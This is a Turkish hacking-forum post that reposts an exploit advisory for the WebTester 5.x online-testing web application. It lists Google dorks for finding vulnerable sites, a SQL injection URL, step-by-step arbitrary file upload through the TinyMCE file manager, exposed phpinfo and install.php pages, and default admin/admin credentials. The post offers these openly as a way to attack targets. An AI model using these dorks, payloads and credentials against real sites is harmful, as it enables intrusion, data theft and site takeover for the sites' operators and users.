Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat )
#1
Kod:
==========================================================================================
WebTester 5.x Multiple Vulnerabilities
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : WebTester 5.x Multiple Vulnerabilities
: # Date : 15 October 2013
: # Author : X-Cisadane
: # CMS Developer : http://epplersoft.com/webtester.html
: # CMS Source Code : http://sourceforge.net/projects/webtesteronline/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) :
================================
intext:Copyright © 2003 - 2010 Eppler Software
inurl:/go.php?testID=
intitle:WebTester Online Testing
Or use your own Google Dorks :)

Proof of Concept
================

[ 1 ] SQL Injection
POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi]
  

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager.
It can be found in tiny_mce/plugins/filemanager.

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Example the target is http://server/
Change the url to http://server/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Pic #1 : http://i40.tinypic.com/117z390.png
Then tick : Insert filetype icon, Insert file size & Insert file modification date.
Click upload and wait until the file sent to the server.
Pic #2 : http://i39.tinypic.com/2wluaon.png
Pic #3 : http://i40.tinypic.com/2uh0fir.png
If the file was successfully uploaded, check in the /test-images/ directory.


[ 3 ] PHPInfo() Disclosure
POC : http://[Site]/[Path]/phpinfo.php


[ 4 ] Leftover install.php File
POC : http://[Site]/[Path]/install.php


Bonus : Default Username and Password
Username : admin
Password : admin
Admin Control Panel : http://[Site]/[Path]/admin/

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/28995/
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Çoklu Güvenlik açığı Stallk3r 0 516 23-01-2014, Saat: 03:36
Son Yorum: Stallk3r
  Arşivimdeki Tüm Dorklar Ve Açıklar Mentalistler 4 484 28-12-2013, Saat: 23:27
Son Yorum: Mentalistler
Anahtar Kelimeler

WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) indir, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Videosu, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Online izle, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Bedava indir, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Yükle, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Hakkında, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Nedir, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Free indir, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Oyunu, WebTester 5.x Çoklu Açıklar ( Yemede Yanında Yat ) Download


1 Ziyaretçi